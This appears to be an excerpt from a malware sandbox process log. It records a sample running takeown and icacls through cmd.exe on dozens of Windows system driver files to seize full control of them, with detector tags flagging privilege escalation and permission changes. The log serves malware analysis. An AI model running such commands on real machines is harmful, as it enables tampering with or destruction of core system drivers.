C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelppm.sys3⤵PID:2364
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"3⤵PID:4044
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit2⤵PID:1692
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipfltdrv.sys3⤵PID:2544
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2776
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit2⤵PID:2184
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IPMIDrv.sys3⤵PID:1524
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"3⤵PID:4352
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit2⤵PID:1144
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipnat.sys3⤵PID:1472
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"3⤵PID:4144
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit2⤵PID:2668
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irda.sys3⤵PID:2500
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"3⤵PID:4940
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:2480
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵PID:2736
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"3⤵PID:4336
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:1912
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:2044
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵PID:4344
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:2620
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:2456
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:4824
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:1696
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵
- Possible privilege escalation attempt
PID:1636
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:4288
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:2820
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵
- Modifies file permissions
PID:1728
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵PID:4904
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:752
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:312
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵PID:3748
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:2888
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵PID:2496
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵PID:3268
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:1012
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵PID:3180
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:4700
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:1972
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵PID:3144
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5248
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:2488
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:3108
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:2296
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:2788
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵PID:3200
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:3160
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:2444
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵PID:3272
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵PID:5280
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:2660
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:3420
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5496
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:924
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:3448
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:5560
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:1120
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵PID:3468
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:5744
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:2100
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵
- Modifies file permissions
PID:3588
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"3⤵PID:5848
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:2232
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵PID:3652
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"3⤵PID:2736
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:2808
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵
- Modifies file permissions
PID:3824
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:6296
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:1648
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:3816
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:1576
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:576
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:3780
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵PID:3700
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:2696
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:3700
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:4464
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:1868
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵PID:4016
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵PID:6596
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:2092
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:3948
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵PID:6384
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:3004
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:3932
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6452
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:2540
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵PID:4080
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6656
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:1620
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵
- Modifies file permissions
PID:2688
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:7052
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:2012
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵PID:3176
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"3⤵PID:6996
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:3096
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵PID:2008
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:1736
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:3152
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵PID:712
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"3⤵PID:7060
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:3168
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵
- Possible privilege escalation attempt
PID:740
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"3⤵PID:5696
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:3216
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:3500
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:5908
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:3236
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:268
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"3⤵PID:4048
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:3260
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵PID:2576
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:6340
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:3284
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:4104
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:712
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:3304
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Modifies file permissions
PID:4252
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:6496
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:3340
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:4316
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵PID:7200
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:3364
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:4260
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:6176
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:3396
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:4280
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:7192
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:3412
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵PID:4416
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:7324
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:3432
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:4296
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵PID:2328
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:3460
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵PID:4304
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:7184
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:3484
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:4424
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵PID:6540
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:3524
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:4596
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7488
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:3536
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵PID:4552
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:7312
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:3556
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:4496
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵PID:7360
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:3576
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:4664
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7556
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:3604
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:4620
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7572
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:3636
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵
- Modifies file permissions
PID:4716
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:7656
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:3660
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵PID:4680
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:7544
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:3680
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:4808
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:7716
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:3716
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵
- Possible privilege escalation attempt
PID:4912
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:3740
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵PID:5024
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:3764
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:5032
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:3796
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵
- Possible privilege escalation attempt
PID:4956
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:3840
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵PID:1484
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:3860
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:4972
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:3876
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:3912
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:3940
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:3572
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:3968
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:2172
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:4004
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵
- Modifies file permissions
PID:2956
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:4032
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵PID:3632
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:4064
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵PID:3388
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:3036
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:1884
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:3032
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵
- Modifies file permissions
PID:4220
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:1644
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:4312
